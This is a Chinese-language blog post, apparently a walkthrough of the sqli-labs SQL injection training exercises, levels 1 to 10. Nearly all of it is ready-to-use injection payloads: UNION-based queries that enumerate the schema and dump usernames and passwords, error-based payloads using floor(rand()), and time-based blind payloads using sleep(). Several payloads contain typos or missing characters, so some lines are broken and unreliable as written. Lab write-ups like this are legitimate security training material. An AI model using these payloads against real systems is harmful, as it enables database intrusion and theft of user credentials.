sql注入1"/>
sql注入1
sql注入
Less-1-10题
首先输入?id=1观察页面,发现能登陆,
使用联合注入
(1) 查找几个字段(需输入错误id)
?id=0‘ order by 3–+页面正常
输入?id=0‘ order by 4–+页面错误,说明有三个字段
(2) 爆数据库名
?id=0’ union select 1,(select database()),3–+
爆出数据库名 security。
(3) 爆表名
?id=0’ union select 1,(group_concatenate(table_name)from information_schema.tables where table_schema=‘security‘),3–+
(4) 爆字段名
?上步得到想要的数据表名users
?id=0‘ union select 1,(group_concat(column_name)from information_schema.columns where table_name=’users’ and table_schema=’security’),3–+
(5) 爆用户名和密码
?id=0‘ union select 1,(select group_concat(username)from security.users),(select group_concat(pasword) from security.users)–+
第一二三四关只是闭合方式不同,有‘ ,“,‘),”)还有“没有闭合”
第五关
当输入正确id时与前四题不同,不能用联合注入法,可以使用时间延迟型注入,布尔型盲注,报错型注入等
(1)爆数据库
?id=-1’ union select count(*),1, concat(’~’,(select database()),’~’,floor(rand()*2)) as a from information_schema.tables group by a–+
(2)爆字段名
?id=-1’ union select count(*),1, concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),’~’,floor(rand()2)) as a from information_schema.tables group by a–+
(3)爆列名
?id=-1’ union select count(),1, concat(’~’,(select column_name from information_schema.columns where table_name=‘users’ limit 1,1),’~’,floor(rand()2)) as a from information_schema.tables group by a–+
(4)爆用户
?id=-1’ union select count(),1, concat(’~’,(select concat_ws(’[’,password,username) from users limit 1,1),’~’,floor(rand()*2)) as a from information_schema.tables group by a–+
1.爆数据库名长度
?id=1’ and if(length(database())=8,sleep(5),1)–+
1
这句话的意思是当数据库名长度为8是页面就先“睡”5秒再刷新。
2.爆数据库名
?id=1’ and if(left(database(),1)=‘s’,sleep(5),1)–+
1
3.爆表名
?id=1’ and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)=‘r’ ,sleep(5),1)–+
1
4.爆字段名
?id=1’ and if(left((select column_name from information_schema.columns where table_name=‘users’ limit 4,1),8)=‘password’ ,sleep(5),1)–+
1
5.爆用户
?id=1’ and if(left((select password from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+
第六关参考第五关,它的闭合方式为双引号闭合
第789参考第五关,其闭合方式为单引号闭合的时间延迟型盲注
第10关为双引号闭合的时间延迟型盲注
更多推荐
sql注入1
发布评论